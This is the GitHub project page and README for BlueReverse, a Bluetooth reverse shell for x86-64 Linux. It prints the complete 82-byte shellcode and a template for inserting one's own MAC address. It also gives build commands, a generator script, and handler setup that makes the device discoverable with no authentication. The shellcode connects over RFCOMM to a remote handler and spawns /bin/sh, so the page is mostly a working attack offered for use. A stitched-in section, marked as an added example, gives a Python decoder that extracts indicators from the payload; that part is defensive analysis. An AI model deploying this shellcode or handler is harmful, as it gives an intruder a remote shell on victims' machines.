Project author: Neetx

Project description:
Bluetooth reverse shell.
Programming language: Python
Project URL: git://github.com/Neetx/BlueReverse.git
Created: 2018-05-01T16:16:21Z
Project page: https://github.com/Neetx/BlueReverse

License: GNU General Public License v3.0


BlueReverse

Bluetooth reverse shell, currently for x86-64 Linux systems.

Copyright (C) 2020 Neetx

BlueReverse is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

BlueReverse is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses

CONTACTS:

Neetx


BlueReverse was implemented as personal research and for fun. It ships a .asm file (client side), a Python 2.7 .py file (server side) and the shellcode.

Fill in the .asm and .py files with your Bluetooth MAC address and the channel you want to use for the communication. Then assemble and link the client:

    nasm -f elf64 brev_shell.asm -o test.o
    ld test.o -o test

Now you must start the server:

    python bluereversehandler.py

Now you can launch the test binary:

    ./test

You will get a prompt on the server side.
I tested the code with an rpi3 (server) and a Debian Stretch (client).


Shellcode:

If you need the shellcode you can extract it with my tool ShellcodeExtractor (https://github.com/Neetx/Shellcode-Extractor):

    objdump -D test.o | python shellcode_extractor.py

My output and its length:

    \x6a\x29\x58\x6a\x01\x5e\x6a\x1f\x5f\x6a\x03\x5a\x0f\x05\x97\x6a\x02\x66\x5e\xb0\x21\x0f\x05\x83\xee\x01\x79\xf7\x48\x31\xc9\xb1\x03\x51\x48\xb9\xe0\xff\x9f\xea\xa3\x14\xd8\x47\x48\xf7\xd1\x51\x54\x5e\xb2\x0a\x48\x31\xc0\xb0\x2a\x0f\x05\x48\x31\xd2\x52\x5e\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05

Length: 82 bytes

You have to generate it yourself, because your MAC address (and possibly your channel) differs from mine.
If you don't use my tool or another tool/command, you have to insert your MAC manually, after applying the NOT operation, because of this in the .asm:

    mov rcx, ~0xXXXXXXXXXXXX001f ;mac + family(1f=31)
    not rcx

(~ MAC + 00 (filler) + 1f (family))

00 is a null byte; to avoid it I use ~, so the value after ~ is stored in the binary in NOT-ed form and the 00 becomes FF. Then "not rcx" at runtime restores the desired value.

Put your Bluetooth MAC address here in place of \xXX\xXX\xXX\xXX\xXX\xXX, in little endian and after the NOT operation:

    \x6a\x29\x58\x6a\x01\x5e\x6a\x1f\x5f\x6a\x03\x5a\x0f\x05\x97\x6a\x02\x66\x5e\xb0\x21\x0f\x05\x83\xee\x01\x79\xf7\x48\x31\xc9\xb1\x03\x51\x48\xb9\xe0\xff\xXX\xXX\xXX\xXX\xXX\xXX\x48\xf7\xd1\x51\x54\x5e\xb2\x0a\x48\x31\xc0\xb0\x2a\x0f\x05\x48\x31\xd2\x52\x5e\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05
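The same NOT trick can be undone from the analyst's side. The script below is an added example and is not part of BlueReverse: given the escaped shellcode string exactly as printed in this README, it locates the `mov cl, <channel> ; push rcx ; mov rcx, <imm64> ; not rcx` sequence, reverses the NOT, and reads back the sockaddr it pushes (2-byte address family, 6-byte bdaddr stored least-significant byte first, then the channel). It also checks for the `socket(31, 1, 3)` prologue (AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM) and reads the execve path, so that a recovered payload of this family can be turned into indicators (peer Bluetooth address and channel) for a handler-side investigation. The byte patterns are assumed to match the layout of the README shellcode; a differently assembled build may not decode.

```python
"""Recover the Bluetooth target from a BlueReverse-style x86-64 shellcode.

Added analysis example, not part of the BlueReverse project.  It undoes the
`mov rcx, ~imm ; not rcx` null-byte avoidance described in the README and
reads the {family, bdaddr, channel} structure the client connect()s to.
"""
import re

# The 82-byte sample shellcode exactly as published in the README
# (the author's own build, pointing at the author's handler).
README_SHELLCODE = (
    r"\x6a\x29\x58\x6a\x01\x5e\x6a\x1f\x5f\x6a\x03\x5a\x0f\x05\x97\x6a\x02\x66\x5e"
    r"\xb0\x21\x0f\x05\x83\xee\x01\x79\xf7\x48\x31\xc9\xb1\x03\x51\x48\xb9\xe0\xff"
    r"\x9f\xea\xa3\x14\xd8\x47\x48\xf7\xd1\x51\x54\x5e\xb2\x0a\x48\x31\xc0\xb0\x2a"
    r"\x0f\x05\x48\x31\xd2\x52\x5e\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51"
    r"\x54\x5f\xb0\x3b\x0f\x05"
)

# socket(AF_BLUETOOTH=31, SOCK_STREAM=1, BTPROTO_RFCOMM=3) prologue:
#   push 0x29; pop rax / push 1; pop rsi / push 0x1f; pop rdi / push 3; pop rdx / syscall
RFCOMM_SOCKET_PROLOGUE = bytes.fromhex("6a29586a015e6a1f5f6a035a0f05")

# mov cl, <channel> ; push rcx ; mov rcx, <imm64> ; not rcx
SOCKADDR_PATTERN = re.compile(rb"\xb1(.)\x51\x48\xb9(.{8})\x48\xf7\xd1", re.DOTALL)

# mov rcx, <8 ASCII bytes> ; push rcx ; push rsp ; pop rdi ; mov al, 0x3b (execve)
EXECVE_PATTERN = re.compile(rb"\x48\xb9(.{8})\x51\x54\x5f\xb0\x3b", re.DOTALL)


def parse_escaped(s):
    """Turn a '\\x6a\\x29...' string into raw bytes."""
    return bytes.fromhex(s.replace("\\x", ""))


def decode_sockaddr_rc(code):
    """Return (family, mac, channel), or None if the pattern is absent."""
    m = SOCKADDR_PATTERN.search(code)
    if m is None:
        return None
    channel = m.group(1)[0]
    stored = int.from_bytes(m.group(2), "little")   # value as it sits in the binary
    runtime = ~stored & 0xFFFFFFFFFFFFFFFF           # what `not rcx` produces
    raw = runtime.to_bytes(8, "little")              # memory image after `push rcx`
    family = int.from_bytes(raw[0:2], "little")      # sa_family_t
    bdaddr = raw[2:8]                                # bdaddr_t, least-significant byte first
    mac = ":".join(f"{b:02X}" for b in reversed(bdaddr))
    return family, mac, channel


def decode_exec_path(code):
    """Return the 8-byte path loaded before the execve syscall, or None."""
    m = EXECVE_PATTERN.search(code)
    return m.group(1).decode("ascii") if m else None


def analyze(escaped):
    """Summarise the indicators recoverable from one escaped shellcode string."""
    code = parse_escaped(escaped)
    target = decode_sockaddr_rc(code)
    return {
        "length": len(code),
        "null_free": b"\x00" not in code,            # why the NOT trick is used
        "rfcomm_socket": RFCOMM_SOCKET_PROLOGUE in code,
        "family": target[0] if target else None,
        "mac": target[1] if target else None,
        "channel": target[2] if target else None,
        "exec_path": decode_exec_path(code),
    }


if __name__ == "__main__":
    for key, value in analyze(README_SHELLCODE).items():
        print(f"{key:14} {value}")
```

On the README sample this reports family 31, channel 3 and the address B8:27:EB:5C:15:60 (a Raspberry Pi OUI, consistent with the rpi3 handler the author mentions), with `/bin//sh` as the execve path and no null byte anywhere in the 82 bytes. The template with `\xXX` placeholders is not valid hex and makes `parse_escaped` raise `ValueError`, which is the expected outcome for an unfilled template.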

Shellcode Generator

Instead of the previous steps you can use my generator.py (Python >= 3.7) to get the shellcode:

    python generator.py MAC CHANNEL

Test Shellcode:

Put your shellcode in the shellcode_tester.c, compile it and test.


Server Side

On the server side you should adapt and use bluereversehandler.py:

    sudo hciconfig <device> piscan
    sudo hciconfig <device> noauth
    python2 bluereversehandler.py

A handler update will be released as soon as possible.

Screenshot
